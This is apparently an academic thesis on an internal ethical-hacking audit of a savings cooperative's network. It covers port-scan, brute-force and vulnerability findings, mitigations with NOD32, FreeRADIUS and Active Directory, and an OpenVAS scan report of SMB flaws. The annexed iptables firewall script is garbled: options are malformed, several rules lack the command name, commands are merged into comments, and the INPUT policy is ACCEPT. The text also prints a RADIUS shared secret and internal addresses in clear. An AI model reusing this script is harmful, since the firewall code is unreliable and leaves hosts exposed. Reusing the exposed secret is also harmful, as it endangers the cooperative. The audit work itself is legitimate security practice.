Visita preliminar 1 días
Evaluación delos siguientes componentes:
Inventario Hardware y Software
Reconocimiento de la Red
Escaneo de Equipos
Escaneo de Puertos y Protocolos Activos en la Intranet
Analisis de Vulnerabilidades y Amenazas
Proceso de Hacking a los Equipos
2 días
2 días
1dias
2 días
2 días
3 días
Pre-informe 2 días
Elaboración del informe final 1 días
TOTAL: 16 días
87
Herramientas y Técnicas.
Entre las herramientas que se utilizarán para la ejecución de esta auditoría
podemos mencionar:
CAIN & ABEL
KALI LINUX
NMAP
METAEXPLOIT
Office (Word, Excel, Power Point).
Tipo de Hacking a Utilizar.
El tipo de Hacking ético a utilizar es interno.
Como su nombre sugiere, este tipo de hacking se ejecuta en la red interna del
cliente, desde el punto de vista de un empleado de la empresa, un consultor, o
un asociado de negocios que tiene acceso a la red corporativa.
Modalidad del Hacking.
White box hacking
Este es el denominado hacking de caja blanca, aunque en ocasiones también
se le llama hacking transparente. Esta modalidad se aplica a pruebas de
intrusión internas solamente y se llama de esta forma porque la empresa
cliente le da al consultor información completa de las redes y los sistemas a
auditar.
Plan de Auditoría.
En caso de ser necesario se realizará los siguientes documentos
Actas de Reunión firmadas por los involucrados.
Actas de Entrega/ Recepción de los documentos solicitados.
88
Informes de Avance de la Auditoría, en caso de ser solicitados por la
Gerencia General o Directorio.
Informe de Auditoría, el cual será expuesto en una reunión final al
Directorio y Gerencia General.
Ejecución de la Auditoría.
Durante la fase de ejecución se realizaron análisis de puertos, protocolos y
vulnerabilidades las cuales están expuestos los equipos de la intranet de la
cooperativa de ahorro y crédito 13 de Abril.
El primer paso una vez realizada la exploración de la infraestructura
tecnológica es seleccionar la victima a la cual vamos a tratar de realizar el
acceso.
Etapa de Escaneo de Puertos.
Resultados.
Tabla 15. Etapa de Escaneo de Puertos.
Fuente: Autor de investigación
Causa: La mala configuración del antivirus y el firewall del equipo permite el barrido de puertos con muchas herramientas que se encuentran en la web.
Efecto:
No se puede controlar el barrido de puertos de los equipos de la red por cuanto los equipos están desprovistos de la utilidad de firewall del antivirus.
Conclusión:
No existe una metodología de protección de los equipos locales, el antivirus existe pero está correctamente configurado
Recomendación:
Se debe implementar políticas de iptables en el equipo Linux y la habilitación del
firewall en el antivirus, para evitar que herramientas de barridos de puertos como
NMAP.
89
Etapa de Mitigación de Ataques de fuerza Bruta
Resultados.
Tabla 16. Etapa de Mitigación de Ataques de Fuerza Bruta
Fuente: Autor de investigación
Causa:
Permite el acceso a los equipos por intentos de posibles de contraseñas.
Efecto:
Acceso no autorizados a los equipos lo que puede ocasionar ciertos daños al software y a la cooperativa ya que se pueden cambiar archivos.
Conclusión:
Este ataque es posible porque la intranet no posee ninguna medida de seguridad para bloquear los intentos fallidos de contraseña.
Recomendación:
Se debe implementar un control de acceso más organizado a través de un
controlador de dominio con Active Directory servicio provisto por Windows
Server 2012
90
Etapa de análisis de vulnerabilidades.
Resultados.
Tabla 17. Etapa Análisis de Vulnerabilidades. Fuente: Autor de investigación
Causa: La poca actualización del Sistema Operativo(XP) que tiene los
equipos de cómputo de la intranet lo hace fácil de explotar a través de herramientas provistas por KALI LINUX
Efecto:
Accesos no autorizados a los equipos que hace posible que se realice
operaciones indebidas en el software que es utilizado por parte de la institución
Conclusión:
No existe licencia del S.O. Windows XP, y este no es posible que se realicen las actualizaciones automáticas de seguridad.
Recomendación:
Se debe adquirir licencias del Sistema Operativos para los equipos, de
preferencia Windows 7 o 8 ya que no existen muchos programas para
explotar una vulnerabilidad y con la adquisición de licencias hace posible el soporte para pedir ayuda sobre las vulnerabilidades.
Causa: Existe poco control sobre quien realiza la autenticación a la red inalámbrica.
Efecto:
Accesos no autorizados a la red inalámbrica lo cual puede influir en el acceso no autorizado a la intranet de la cooperativa.
Conclusión:
No existe control de accesos a la red inalámbrica de la cooperativa y tiene una contraseña muy débil basada en palabras de diccionario.
Recomendación:
Se debe implementar un servidor de autenticación radius para poder controlar la autenticación de usuarios.
91
3.3.5. Conclusiones parciales, para mejorar la seguridad de la intranet de
la Cooperativa de Ahorro y Crédito.
Para el Problema de escaneo de puertos y análisis de vulnerabilidades se
realiza una configuración con el antivirus que están instalados en la empresa.
Para evitar que puedan ser escaneados los puertos de los servidores de base
de datos y aplicación se realiza la implementación de iptables ya que estos
están instalados en el sistema Operativo Linux.
Para controlar los accesos a la intranet a través de los equipos y poder
controlar los ataques de fuerza bruta se implementó un servidor con Sistema
Operativo Windows Server 2012 como controlador de dominio con Active
Directory.
El control de acceso al servicio de red inalámbrica el cual es netamente para
los empleados de la Cooperativa de Ahorro y Crédito 13 de Abril Ltda., se lo
realiza con la implementación de un servidor freeradius.
Todas estas implementaciones están detalladas en el anexo 3.
92
CONCLUSIONES Y RECOMENDACIONES
Conclusiones
Para la implementación de Hacking ético se instalaron herramientas de
libre distribución para plataformas Windows y Linux como
Look@LAN,Net Tools, Medusa, Nmap, Hping3 entre otras, que
permitieron generar los ataques de penetración a la intranet.
Los ataques que se aplicaron dentro de la red fueron escaneo de puerto,
fuerza bruta, hombre en el medio.
El software implementado para el monitoreo y análisis de resultados fue
CAIN & ABEL, el cual, permitió identificar el equipo que originó los
ataques, los puertos y protocolos utilizados por las herramientas para
lograr detectarlas vulnerabilidades de la red; el nivel de concurrencia de
los eventos que pudieron registrarse en contra de la seguridad de los
servicios.
Una vez identificados y analizados los resultados de los ataques (red y
servidor), se aplicaron soluciones para la mitigación en los equipos
virtualizados, a través de la implementación del producto de seguridad
antivirus, ESET Smart Security 6,el cual filtró ataques de red a través del
Corta fuegos personal, además el módulo de análisis en tiempo real
permitió eliminar aplicaciones peligrosa se indeseables que fueran las
causantes de generación de ataques.
93
Recomendaciones
Se recomienda implementar un control más estricto en los clientes,
siendo necesario limitar los permisos de usuario en cada equipo, con la
finalidad de impedir que las personas que puedan laborar dentro de
una compañía, instalen aplicaciones innecesarias que les permita
generar acciones en contra delos equipos de la red y los servicios
prestados.
Es importante actualizar los productos de seguridad de software y
hardware, debido a que, en cada nueva versión se aplican correcciones
y nuevas funcionalidades que ayudarán a detectar y controlar ataques
nuevos o poco conocidos.
Crear conciencia en el usuario de los riesgos y peligros al no ser
responsables de la secciones y actividades que realizan, ya que
estadísticamente se ha comprobado que los principales ataques a una
compañía se lo realizan internamente, por personas que al tener
conocimiento de equipos y redes, intentan aprovechar el acceso
ilimitado que pueden tener para sacar algún provecho e incluso distribuir
o difundir información confidencial de las empresas a terceras personas.
Es recomendable el uso de la virtualización a nivel empresarial, ya que
es una manera de suprimir gastos dentro de la compañía, tener el
control delos eventos que generan los usuarios y disminuir el espacio
físico ocupado por los equipos informáticos.
BIBLIOGRAFÍA
Sitio Oficial de Kali (2013).Definición y características de KAli
recuperadoes.docs.kali.org/introduction-es
Ed Skoudis.(2006). Phone phishing: The role of VoIP in phishing attacks
Sitio oficial de Aircrack. (2012) .Utilización de Aircrack recuperado
http://www.aircrack-ng.org/doku.php?id=es:aircrack-ng
Jara H, &Pacheco F.(2012). Ethical Hacking 2.0 : Costa Rica:Fox Andina
Sitio de Historia del Hacking Latinoamericano. (2014). Definición de
Ingeniería Social recuperado http://hackstory.net/Ingenieria_Social
Sitio Oficial de Open Vas .2013.Utilización y Definición de Open Vas
recuperado www.openvas.org
ISECOM 2010. Hacker Highschool. Identification de sistemas: USA :
Editorial de ISECOM
Catoira F. (2012).Consejos para evitar un ataque de denegación de
servicio.: Argentina: ESET Latinoamérica.
Sitio de empresa que realiza Ethical Hacking.(2013).Tipos de Hacking
recuperado http://www.elixircorp.biz/tipos-de-hacking.html
BCS SIGIST.(2001). British Computer Society Specialist Interest Group
in Software Testing: USA Working Draft
Himanen P. (2002). La ética del hacker y el espíritu de la era de la
información : España: Editorial Destino. ISBN 84-233-3390.
Sito de Información sobre redes(2005).Topologías de la Redes
recuperado
http://www.econ.uba.ar/www/departamentos/sistemas/plan97/tecn_infor
mac/briano/seoane/tp/2002_1/redes.htm
Perpinan A. (2010). Administración en redes: Republica Dominicana:
Editorial Fundación Código Libre
Suárez I.(2006).Las redes informáticas: Cuba :Instituto Superior
Pedagógico, Facultad de Ciencias Técnicas Conrado Benítez García
Malagón C.(2010).Hacking Ético: España: Universidad de Nebrija
Tori C.(2008). Hacking Etico: Argentina: Rosario
Tanenbaum A.(2003).Redes de Computadora: USA: Prentice hall
Jara H, &Pacheco F.(2012). Ethical Hacking 2.0 : Costa Rica: Fox
Andina
Álvarez G,& Perez P.(2009). Seguridad Informática para empresas y
particulares:España: McGrawHill
Dordoigne J.(2003).Redes Informáticas Nociones Fundamentales:
España: McGrawHill
Garzón M, &Sampalo M.(2009): Informática IV: España: MADS.L.
Scambray j,&Mcclure S.(2008). Secretos y soluciones de seguridad en
Windows: España: McGrawHill
Información Phreaking.(2010).Definición de Phreaking recuperado
http://www.alegsa.com.ar/Dic/phreaking.php
Biltz K. (2010). El Sendero del Hacker: España: Open Libra
Giménez V.(2012). Hacking y ciberdelito : España: Universidad
politécnica de Valencia
Astudillo K.(2013). Hacking ético Como hackear profesionalmente en 21
dias: Charleston USA: SC
Seguridad Informática Ethical Hacking, 2da. Edición eni ediciones,
colección épsilon, Acissi
ANEXOS
ANEXO No. 1 VALIDACION
Certificado Experto 1
Certificado Experto 2
ANEXO No. 2 ENCUESTA
Encuesta dirigido al personal que labora en la institución
1.- ¿Existen medidas de seguridad en el departamento que usted labora?
Si
No
2.- ¿De las siguientes medidas de seguridad marque con una X la que
considera que existen?
Cambio de contraseña periódica.
Antivirus instalado y actualizado periódicamente.
Bloqueo Automático del equipo.
Control de acceso a su equipo.
Control de acceso en unidades extraíbles.
Revisión periódica por parte del encargado de tecnologías.
Ninguna.
3.- Conecta usted su equipo portátil o algún dispositivo móvil a la red
inalámbrica de la cooperativa.
Si
No
4.- En caso de afirmativa la respuesta anterior marque con una X una de las
siguientes opciones.
Realizo la conexión sin ninguna ayuda
Solicito al encargado de tecnologías alguna contraseña para la conexión.
El encargado de tecnología tuvo que realizar alguna tarea con su equipo para
la conexión.
5.-Realiza usted alguna tarea para asegurar la información de la empresa que
se encuentra en su equipo.
Si
No
6.- En caso de afirmativa la respuesta anterior marque con una X que tareas
realiza para asegurarla.
Respalda sus archivos
Pone contraseñas a los archivos.
Posee en su computador algún programa que le permite colocar contraseña
7.- Existe alguna política de seguridad para él envió de contraseñas.
Si
No
8.- Existe algún manual que detalle la transición de contraseñas entre personal
al momento de asumir alguna función o es cesado de su puesto.
Si
No
9.- Usa su correo electrónico para responder cadenas o correos de
destinatarios desconocidos.
Si
No
10.- Cree usted que se requiere implantar ciertos niveles de seguridad en la
intranet y los servicios de la cooperativa.
Si
No
11.- Cree usted que se debe realizar un hacking ético en la red de la
cooperativa para comprobar los niveles seguridad
ANEXO No. 3 MITIGACIÓN ATAQUES DE ESCANEO DE PUERTOS
Mitigación ataques de escaneo de puertos
El Sistema de prevención de intrusiones basado en el Host (HIPS) se
encuentra incluido en ESET NOD32 Antivirus y ESET Smart Security 5. HIPS
monitorea la actividad del sistema y emplea un conjunto de reglas predefinidas
con el fin de reconocer un comportamiento sospechoso del sistema. Cuando
esta clase de actividad es identificada, el mecanismo de autodefensa de HIPS
detiene el programa o proceso amenazante para evitar la potencial actividad
dañina.
Se calibro la herramienta Nod 32 Antivirus 8 con la configuración que se
muestra en la imagen.
Configuración de NOD 32
Elaborador por: Cristhian Villares Saltos
Podemos observar que se encuentra activado lo siguiente:
Protección de archivos en tiempo Real
HIPS
Protección de acceso a la Web
Proteccion de correo electronico
Protección antipishing
Para cada uno de ellos se realizó la siguiente configuración para evitar accesos
no autorizados a los equipos provistos con Windows XP.
Protección de archivos en tiempo Real.
Es activada en los equipos para controlar todos los eventos relacionados con el
antivirus en el sistema.Todos los archivos son analizados en busqueda de
codigo malicisioso en el momento que se abren.
Configuración de Protección en tiempo real de NOD 32
Elaborador por: Cristhian Villares Saltos
En la configuración de análisis de NOD 32 en la opción de Medios para analizar
tenemos lo siguiente.
Protección del sistema de archivos en tiempo real de NOD 32
Elaborador por: Cristhian Villares Saltos.
En la opción de protección de documentos se realiza la configuración de Nivel de
desinfección sobre los análisis realizados con el NOD 32 , seleccionamos sin
desinfectar ya que en caso contrario todo archivo catalogado como malicioso por
el antivirus será eliminado.
Nivel de desinfección Configuración de NOD 32
Elaborador por: Cristhian Villares Saltos
Respecto a las extensiones de archivos que revise el NOD 32 vamos a dejar
todas, para que todo tipo de archivos sean analizados y en caso de alguna
anomalía este sea enviado a cuarentena, las otras opciones se las ha
configurado como predeterminada haciendo referencia a los Objetos, Limites y
otros.
Configuración de extensiones de NOD 32
Elaborador por: Cristhian Villares Saltos
Esta opción es la más importante para mitigar el escaneo de puertos viene
predeterminada la configuración de las reglas también las podemos personalizar
sin embargo es recomendable dejarla de esa manera la siguiente figura muestra
la configuración.
Configuración HIPS de NOD 32
Elaborador por: Cristhian Villares Saltos
Para finalizar la configuración del HIPS se activan las opciones de registrar todas
las operaciones bloqueadas y Notificar cuando se produzcan cambio en las
aplicaciones de inicio esto se encuentra en la configuración avanzada que se
muestra en la siguiente figura.
Configuración HIPS de NOD 32
Elaborador por: Cristhian Villares Saltos
Adicionalmente se realiza la habilitación del puerto en firewall de Windows de la
aplicación utilizada por el equipo en este caso es el puerto 1433 de Sql Server.
Configuración de Firewall de Windows
Elaborador por: Cristhian Villares Saltos
Asi mismo los puertos de con los que trabaja el Active Directory que se
instalara en un Equipo con Windows Server 2012 para la configuración de
usuarios y Grupos y demás politicas de aseguramiento que se realizaran en la
Red de la cooperativa de ahorro y credito 13 de Abril de la ciudad de Ventanas.
Acontinuación se detallan en la siguiente tabla.
Protocolo de aplicación
Protoco
lo
Puertos
Servidor de catálogos globales
TCP
3269
Servidor de catálogos globales
TCP
3268
Servidor LDAP
TCP
389
Servidor LDAP
UDP
389
LDAP SSL
TCP
636
LDAP SSL
UDP
636
IPsec ISAKMP
UDP
500
NAT-T
UDP
4500
RPC
TCP
135
Puertos habilitados en firewall de Windows.
Elaborador por: Cristhian Villares Saltos
Configuración al server de Linux Agregada por IP tables.
#!/bin/bash
# descarga todos los enlaces iptables - F
# prepara las reglas de cada enlace pre-definido iptables - P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD DROP
# permite conexión establecidas por paquetes que vienen de otras
computadoras iptables -A INPUT -m state -state RELATED,ESTABLISHED -j
ACCEPT
# anti-SYN flood iptables -N no-syn-flood
iptables -A no-syn-flood -m limit --limit 1/s --limit-burst 4 -j RETURN
iptables -A no-syn-flood -j DROP
# Abriendo puerto ssh
-A INPUT -p tcp -m state -state NEW -m tcp -dport 22 -j ACCEPT
# Abriendo puerto smtp
-A INPUT -p tcp -m state -state NEW -m tcp -dport 25 -j ACCEPT
-A INPUT -p tcp -m state -state NEW -m tcp -dport 143 -j ACCEPT
# Abriendo puerto 1433
-A INPUT -p tcp -m state -state NEW -m tcp -dport 1433 -j ACCEPT
-A INPUT -p tcp -m state -state NEW -m tcp -dport 80 -j ACCEPT
# Abriendo puerto NetBios
-A INPUT -p tcp -m state -state NEW -m tcp -dport 445 -j ACCEPT
# Abriendo puerto Samba
-A INPUT -p tcp -m state -state NEW -m tcp -dport 139 -j ACCEPT
# no permite que nada más entre
iptables -A INPUT -i eth0 -p udp -j DROP
iptables -A INPUT -i eth0 -p tcp -m tcp -syn -j DROP
# acepta todo de localhost
iptables -A INPUT -i lo -j ACCEPT
Resultado de escaneo de puertos luego de la aplicación de soluciones en el
antivirus y el firewall de Linux. Podemos observar el resultado en la siguiente
figura.
Resultado luego de las implementaciones de seguridad
Elaborador por: Cristhian Villares Saltos
Actualización de Windows para evitar la explotación de la vulnerabilidad
445
Implementación de Servidor Radius.
La instalación se la realiza en un equipo con el sistema operativo Ubunto para lo
cual ejecutamos el siguiente comando.
aptitude install freeradius.
Se procede con la instalación.
Una vez realizada la instalación debemos realizar la configuración de los usuarios
que se autenticaran a través de nuestro servidor para lo cual se deberá modificar
el archivo /etc/freeradius/users y procedemos a agregar los usuarios que se
autenticaran en nuestro servidor radius a nuestra red inalámbrica.
Ahora vamos a configurar los puntos de acceso.
Para introducir la información sobre los clientes (puntos de acceso que solicitarán
la verificación de usuarios inalámbricos finales) en la configuración de Radius
modificaremos el archivo / etc/ freeradius/ clients.conf donde introduciremos la
información de las IP de los puntos de acceso que quieran emplear el servidor
(192.168.0.50 en nuestro caso), así como la contraseña entre punto de acceso y
servidor (secret = resultados2016*+-),y el nombre de la red o SSID (shortname =
coop13) tal como muestra la siguiente imagen:
Luego se procede a realizar la configuración en el punto de acceso de tal menra
que la autenticación la realice radius.
Con esto evitamos que cualquier persona que se le haya entregado una vez la
clave de la red inalámbrica y este la divulgue nos era posible ya que necesita un
usuario y una contraseña configurados en su dispositivo para poder acceder con
esto se controla al acceso a la red inalámbrica.
Implementación de Dominio con Active Directory para evitar ataques por
fuerza bruta y controlar los accesos a los servicios y equipos de la
cooperativa.
Implementación de Servidor de Controlador de Dominio con Active Directory en
Windows Server 2012.
Para esto instalamos con Windows Sever 2012 y lo configuramos para que
este en la red de la Cooperativa.
Damos click en añadir y remover roles y nos muestra la siguiente pantalla.
Luego click en Next y se selecciona el servidor en el caso de estudio de la
cooperativa se visualiza solo uno y lo seleccionamos
Luego damos click en next y muestra la siguiente pantalla y seleccionamos
servicios de active directory
Nos muestra una pantalla con todo lo necesario para su instalación.
Le damos cick añadir features.
Click en next y nos muestra la pantalla de Role que se va instalar en nuestro
servidor
Confirmamos la instalación y click en install
Luego sale la pantalla de progreso de instalación.
Luego de ver finalizado con la instalación se debe proceder con la promoción
del servidor a controlador de dominio.
Procedemos a crear un nuevo bosque llamado coop13abril.com.ec
Agregamos el nivel funcional del bosque esto quiere decir desde que versión se
puede agregar configuración de otros controladores de dominio esto es con la
intención de administración en conjunto con varias versiones de Windows
server, también pide la clave de administrador de controlador de dominio.
Le damos click en next y comprueba el nombre Netbios ya asignado
Especifique la ubicación de los anuncios relacionados con carpetas y haga clic
en siguiente o dejamos por default.
Visualizamos un resumen de las opciones instaladas
Procede a un chequeo de prerrequisitos el mensaje muestra que están
completos.
Y se procede a la instalación.
Una vez realizada toda la instalación y configuración inicial de nuestro Windows
server 2012 con active directory procedemos a crear los usuarios y grupos de
acuerdo al orgánico funcional de la empresa.
Para esto vamos a la opción Server Manager a tolos y a la opción Active
Directory Users and computers
Se nos despliega la siguiente pantalla donde vemos el dominio creado y
opcione que viene de forma predeterminada en la configuración, primero
vamos a crear los grupos damos click derecho sobre el subdominio y la opción
new seleccionamos group
Procedemos a crear el grupo crédito donde van a formar parte todos los
usuarios de ese departamento
Una vez creado el grupo vamos a crear un nuevo usuario y luego lo vamos
asignar a ese grupo.
Damos click en siguiente para poder establecer la contraseña
Una vez realizada la creación debemos hacerlo pertenecer a un grupo esto se
lo realiza con el objetivo de establecer políticas sobre los sistemas operativo a
un grupo de usuarios.
Aparecerá la siguiente pantalla donde vamos a buscar el grupo en la opción
Advanced y luego click find now
Y seleccionamos al grupo que queremos asignar el usuario en nuestro caso
crédito y click en ok
Al finalizar deberá salir un mensaje como el siguiente
Si deseamos podemos organizar aun de mejor manera nuestro active directory
creando unidades organizativas el proceso es igual para crear un grupo o un
usuario.
Una vez creado todos los grupos y usuarios en nuestro Active directory el
siguiente proceso es agregar los equipos clientes a nuestro active directory
para lo cual seguimos el siguiente procedimiento.
Ingresamos la configuración de red de nuestro equipo y establecemos el
servidor DNS en nuestro caso la IP del servidor de nuestro controlador de
dominio
Una vez ingresando a las propiedades del equipo ingresamos a las opciones
para ingresar al equipo al dominio coop13abril.com.ec
Una vez ingresado a las propiedades nos vamos a la pestaña nombre de
equipo cambiar
Una vez que logra comunicarse con nuestro controlador de dominio nos solicita
el usuario y password del Administrador una vez realizado esto nos debe
aparecer la siguiente pantalla dando la bienvenida.
Luego de esto se procederá a reiniciar el equipo se procederá a ingresar al
dominio ingresando el usuario creado en nuestro caso cvillares dentro de las
políticas seleccionamos que debe cambiar la contraseña en el primer reinicio
esto asegura primero un grado de complejidad y segundo la confidencialidad
de la misma.
.
Una vez realizado el cambio de contraseña se iniciara la sesión en nuestro
controlador de dominio con nuestro usuario y los privilegios que vienen en la
política de grupo predeterminadamente.
Por ejemplo uno de los bloqueos de privilegios es que no puede cambiar la
configuración de red es decir las direcciones IP etc.
Procedemos a configurar las políticas de grupo a continuación se muestra la
opción del Administrador del servidor.
Aquí observamos el árbol que se despliega y vemos que existe una política por
default aplicada al dominio coop13abril.com.ec
Podemos observar nuestra unidad organizativa y vamos a crearle una política
de grupo
Creamos la nueva política de grupo que estará asignada a mi grupo de crédito
en este caso
Y luego de estar creada le damos click derecho edit para poder establecer
como se comporte nuestro usuario que se conecta al equipo.
Aquí tenemos para cada componente de Windows como queremos que se
comporte uno que aplicamos es el de que no tenga acceso a la papelera de
reciclaje.
Para configurarlo basta con darle click derecho y se procede habilitar.
Se aplicaron muchas políticas de acceso a los servicios de los equipos en la
Red.
Uno de los más importantes que se detallan es el número de intentos de
contraseña que tiene el usuario esto evita los ataques de fuerza bruta hacia los
equipos del dominio a continuación visualizamos donde se habilitó esta opción.
Para esto nos vamos al centro de administración de active directory a system-
password setting.
Lugo de dar click en new se despliega las siguientes opciones pero la que más
nos interesa para evitar los ataques por fuerza bruta es enforce account
lockout policy
Es importante indicar que con la implementación de esta solución asegura
impedir accesos no autorizados a la intranet, por cuanto cada usuario se le
realiza una cuenta la cual es responsable y se le asignan privilegios de acuerdo
a sus funciones, también es importante indicar que el Controlador de Dominio
implementado en la Cooperativa se dejó una configuración base con las
políticas de grupo necesarias pero se capacito al persona de Tics para que
puedan establecer nuevas políticas de acuerdo las necesidades de
aseguramiento de la intranet y sus servicios.
ANEXO No. 4 INFORME DE ANÁLISIS
Scan Report
October 11, 2015
Summary
This document reports on the results of an automatic security scan. All dates are dis-
played using the timezone \Coordinated Universal Time", which is abbreviated \UTC". The
task was \Immediate scan of IP 192.168.0.6". The scan started at Sun Oct 11 05:38:00
2015 UTC and ended at Sun Oct 11 05:42:41 2015 UTC. The report rst summarises the
results found. Then, for each host, the report describes every issue found. Please consider
the advice given in each description, in order to rectify the issue.
Contents
1 Result Overview 2
1.1 Host Authentications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
2 Results per Host 2
2.1 192.168.0.6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
2.1.1 High 445/tcp . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
2.1.2 Log 445/tcp . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
2.1.3 Log general/tcp . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
2.1.4 Log general/icmp . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
2.1.5 Log general/SMBClient . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
2.1.6 Log general/CPE-T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
2.1.7 Log 139/tcp . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
2 RESULTS PER HOST
1 Result Overview
Host High Medium Low Log False Positive
192.168.0.6 3 0 0 11 0
Total: 1 3 0 0 11 0
Vendor security updates are not trusted. Overrides are on. When a result has an override, this report uses the threat of the override. Notes are included in the report. This report might not show details of all issues that were found. It only lists hosts that produced issues. Issues with the threat level \Debug" are not shown.
This report contains all 14 results selected by the ltering described above. Before ltering there were 14 results.
1.1 Host Authentications
Host Protocol Result Port/User
192.168.0.6 SMB Success Protocol SMB, Port 445, User
2 Results per Host
2.1 192.168.0.6
Host scan start Sun Oct 11 05:38:36 2015 UTC Host scan end Sun Oct 11 05:42:41 2015 UTC
Service (Port) Threat Level 445/tcp High
445/tcp Log
general/tcp Log
general/icmp Log
general/SMBClient Log
general/CPE-T Log
139/tcp Log
2.1.1 High 445/tcp
High (CVSS: 10.0) NVT: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Remote
. . . continues on next page . . .
2 RESULTS PER HOST
. . . continued from previous page . . . Summary This host is missing a critical security update according to Microsoft Bulletin MS09-001.
Vulnerability Detection Result Vulnerability was detected according to the Vulnerability Detection Method.
Impact Successful exploitation could allow remote unauthenticated attackers to cause denying the service by sending a specially crafted network message to a system running the server service. Impact Level: System/Network
Solution Solution type: VendorFix Run Windows Update and update the listed hot xes or download and update mentioned hot xes in the advisory from the below link, http://www.microsoft.com/technet/security/bulletin/ms09-001.mspx
A ected Software/OS Microsoft Windows 2K Service Pack 4 and prior. Microsoft Windows XP Service Pack 3 and prior. Microsoft Windows 2003 Service Pack 2 and prior.
Vulnerability Insight The issue is due to the way Server Message Block (SMB) Protocol software handles specially crafted SMB packets.
Vulnerability Detection Method Details:Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Remote OID:1.3.6.1.4.1.25623.1.0.900233 Version used: $Revision: 1564 $
References CVE: CVE-2008-4114, CVE-2008-4834, CVE-2008-4835 BID:31179 Other:
URL:http://www.milw0rm.com/exploits/6463 URL:http://www.microsoft.com/technet/security/bulletin/ms09-001.mspx
High (CVSS: 10.0) NVT: Microsoft Windows SMB Server NTLM Multiple Vulnerabilities (971468)
Summary This host is missing a critical security update according to Microsoft Bulletin MS10-012.
Vulnerability Detection Result Vulnerability was detected according to the Vulnerability Detection Method.
. . . continues on next page . . .
2 RESULTS PER HOST
. . . continued from previous page . . . Impact Successful exploitation will allow remote attackers to execute arbitrary code or cause a denial of service or bypass the authentication mechanism via brute force technique. Impact Level: System/Application
Solution Solution type: VendorFix Run Windows Update and update the listed hot xes or download and update mentioned hot xes in the advisory from the below link, http://www.microsoft.com/technet/security/bulletin/ms10-012.mspx
A ected Software/OS Microsoft Windows 7 Microsoft Windows 2000 Service Pack and prior Microsoft Windows XP
Service Pack 3 and prior Microsoft Windows Vista Service Pack 2 and prior Microsoft Windows Server 2003 Service Pack 2 and prior Microsoft Windows Server 2008 Service Pack 2 and prior
Vulnerability Insight - An input validation error exists while processing SMB requests and can be exploited to cause a bu er over ow via a specially crafted SMB packet. - An error exists in the SMB implementation while parsing SMB packets during the Negotiate phase causing memory corruption via a specially crafted SMB packet. - NULL pointer dereference error exists in SMB while verifying the 'share' and 'servername' elds in SMB packets causing denial of service. - A
lack of cryptographic entropy when the SMB server generates challenges during SMB NTLM authentication and can be exploited to bypass the authentication mechanism.
Vulnerability Detection Method Details:Microsoft Windows SMB Server NTLM Multiple Vulnerabilities (971468) OID:1.3.6.1.4.1.25623.1.0.902269 Version used: $Revision: 1564 $
References CVE: CVE-2010-0020, CVE-2010-0021, CVE-2010-0022, CVE-2010-0231 Other:
URL:http://secunia.com/advisories/38510/ URL:http://support.microsoft.com/kb/971468 URL:http://www.vupen.com/english/advisories/2010/0345 URL:http://www.microsoft.com/technet/security/bulletin/ms10-012.mspx
High (CVSS: 7.5) NVT: Microsoft Windows SMB/NETBIOS NULL Session Authentication Bypass Vulnerability
Summary The host is running SMB/NETBIOS and prone to authentication bypass Vulnerability
Vulnerability Detection Result Vulnerability was detected according to the Vulnerability Detection Method. . . . continues on next page . . .
2 RESULTS PER HOST
. . . continued from previous page . . .
Impact Successful exploitation could allow attackers to use shares to cause the system to crash. Impact Level: System
Solution Solution type: WillNotFix No solution or patch was made available for at least one year since disclosure of this vulnerability.
Likely none will be provided anymore. General solution options are to upgrade to a newer release,
disable respective features, remove the product or replace the product by another one. A workaround is to, - Disable null session login. - Remove the share. - Enable passwords on the share.
A ected Software/OS Microsoft Windows 95 Microsoft Windows 98 Microsoft Windows NT
Vulnerability Insight The aw is due to an SMB share, allows full access to Guest users. If the Guest account is enabled, anyone can access the computer without a valid user account or password.
Vulnerability Detection Method Details:Microsoft Windows SMB/NETBIOS NULL Session Authentication Bypass Vulnerability OID:1.3.6.1.4.1.25623.1.0.801991 Version used: $Revision: 1642 $
References CVE: CVE-1999-0519 Other:
URL:http://xforce.iss.net/xforce/xfdb/2 URL:http://seclab.cs.ucdavis.edu/projects/testing/vulner/38.html
[ return to 192.168.0.6 ]
2.1.2 Log 445/tcp
Log (CVSS: 0.0) NVT: SMB NativeLanMan
Summary It is possible to extract OS, domain and SMB server information from the Session Setup AndX Response packet which is generated during NTLM authentication.
Vulnerability Detection Result Summary: It is possible to extract OS, domain and SMB server information from the
Session Setup AndX Response packet which is generated . . . continues on next page . . .
2 RESULTS PER HOST
. . . continued from previous page . . . during NTLM authentication.Detected SMB workgroup: WORKGROUP Detected SMB server: Windows 2000 LAN Manager Detected OS: Windows 5.1
Log Method Details:SMB NativeLanMan OID:1.3.6.1.4.1.25623.1.0.102011 Version used: $Revision: 43 $
Log (CVSS: 0.0) NVT: SMB log in
Summary This script attempts to logon into the remote host using login/password credentials.
Vulnerability Detection Result It was possible to log into the remote host using the SMB protocol.
Log Method Details:SMB log in OID:1.3.6.1.4.1.25623.1.0.10394 Version used: $Revision: 1860 $
Log (CVSS: 0.0) NVT: SMB on port 445
Summary This script detects wether port 445 and 139 are open and if thet are running SMB servers.
Vulnerability Detection Result A CIFS server is running on this port
Log Method Details:SMB on port 445 OID:1.3.6.1.4.1.25623.1.0.11011 Version used: $Revision: 41 $
Log (CVSS: 0.0) NVT: Microsoft Windows SMB Accessible Shares
Summary The script detects the Windows SMB Accessible Shares and sets the result into KB.
Vulnerability Detection Result . . . continues on next page . . .
2 RESULTS PER HOST
. . . continued from previous page . . . The following shares where found IPC$
Log Method Details:Microsoft Windows SMB Accessible Shares OID:1.3.6.1.4.1.25623.1.0.902425 Version used: $Revision: 977 $
[ return to 192.168.0.6 ]
2.1.3 Log general/tcp
Log (CVSS: 0.0) NVT: OS ngerprinting
